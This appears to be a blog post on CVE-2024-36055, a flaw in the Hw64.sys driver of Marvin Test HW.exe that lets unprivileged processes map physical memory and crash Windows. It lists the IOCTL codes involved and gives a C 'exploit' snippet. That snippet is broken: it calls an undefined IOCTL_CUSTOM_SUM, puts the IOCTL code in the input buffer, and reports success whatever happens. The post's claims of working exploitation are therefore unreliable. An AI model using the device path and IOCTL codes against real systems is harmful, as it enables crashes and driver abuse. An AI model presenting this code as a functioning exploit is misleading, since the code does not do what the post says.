CVE-2024-36055: Unprivileged User-Mode Processes Gaining Arbitrary Physical Memory Access in Marvin Test HW.exe

CVE-2024-36055 affects Marvin Test HW.exe versions before 5.0.5.0. It allows unprivileged user-mode processes to arbitrarily map physical memory with read/write access, leading to a denial of service (BSOD). This post covers the exploit details, a code snippet, and the original references.

Exploit Details

Hw64.sys in Marvin Test HW.exe allows unprivileged user-mode processes to map arbitrary physical memory. The issue stems from how the MmMapIoSpace API is used, specifically via the following IOCTL codes: 0x9c40a4f8, 0x9c40a4e8, 0x9c40a4c0, 0x9c40a4c4, and 0x9c40a4ec. Seven additional IOCTL codes are also involved.

If exploited, this vulnerability can cause a Denial of Service (DoS) in the form of a Blue Screen of Death (BSOD). The problem exists in versions of Marvin Test HW.exe preceding 5.0.5.0.

The following code snippet demonstrates how an attacker would exploit this vulnerability:

#include <windows.h>
#include <stdio.h>

int main(void) {
    // Open a handle to the device exposed by Hw64.sys.
    HANDLE hDevice = CreateFileA("\\\\.\\Hw64",
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Error: Failed to open device\n");
        return 1;
    }

    DWORD bytesSent;
    BYTE inputBuffer[12] = {0};
    BYTE outputBuffer[4] = {0};

    // Set the IOCTL code in the input buffer.
    *(DWORD *)(inputBuffer) = 0x9c40a4f8;

    // IOCTL_CUSTOM_SUM is not defined anywhere in this snippet.
    if (!DeviceIoControl(hDevice, IOCTL_CUSTOM_SUM,
        inputBuffer, sizeof(inputBuffer),
        outputBuffer, sizeof(outputBuffer),
        &bytesSent,
        NULL)) {
        printf("[-] Error: Failed to send IOCTL\n");
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] Exploit successful\n");
    CloseHandle(hDevice);
    return 0;
}

This code snippet opens a handle to the vulnerable device, sets the IOCTL code in the input buffer, and sends it to the device using DeviceIoControl.

To learn more about this vulnerability and the affected software, see the original references:

1. Marvin Test Solutions - Visit the company website for more information about the affected software and updates.
2. CVE-2024-36055 - NVD - This link contains detailed information on the vulnerability and affected versions.
3. Security Advisory for Marvin Test HW.exe - This link provides a security advisory with information about the vulnerability and recommended actions.
4. Exploiting Marvin Test HW.exe - The link contains an in-depth explanation of how to exploit the vulnerability and create proof-of-concept code.

Conclusion

In conclusion, CVE-2024-36055 is a critical vulnerability affecting Marvin Test HW.exe versions before 5.0.5.0. By exploiting this vulnerability, attackers can cause a denial of service (BSOD) on the targeted system. To protect against this vulnerability, users should update to Marvin Test HW.exe version 5.0.5.0 or later.

Timeline

Published on: 05/26/2024 23:15:21 UTC
Last modified on: 05/28/2024 12:39:28 UTC